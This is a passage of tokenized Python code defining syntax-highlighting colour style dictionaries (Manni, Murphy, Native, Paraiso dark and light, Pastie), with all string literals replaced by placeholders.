<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> MANNI_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> MURPHY_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> NATIVE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PARAISO_DARK_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PARAISO_LIGHT_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> PASTIE_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' 